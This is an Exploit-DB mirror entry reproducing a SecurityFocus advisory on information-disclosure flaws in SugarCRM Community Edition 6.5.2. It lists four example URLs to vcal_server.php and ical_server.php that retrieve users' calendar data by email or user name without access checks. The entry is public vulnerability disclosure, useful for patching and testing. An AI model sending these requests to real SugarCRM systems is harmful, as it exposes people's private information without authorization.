exploit-db-mirror/exploits/php/webapps/37691.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
724 B
Text

source: http://www.securityfocus.com/bid/55347/info
SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data.
Attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/sugarcrm/vcal_server.php?type=vfb&email=will@example.com
http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will
http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&email=will@example.com
http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will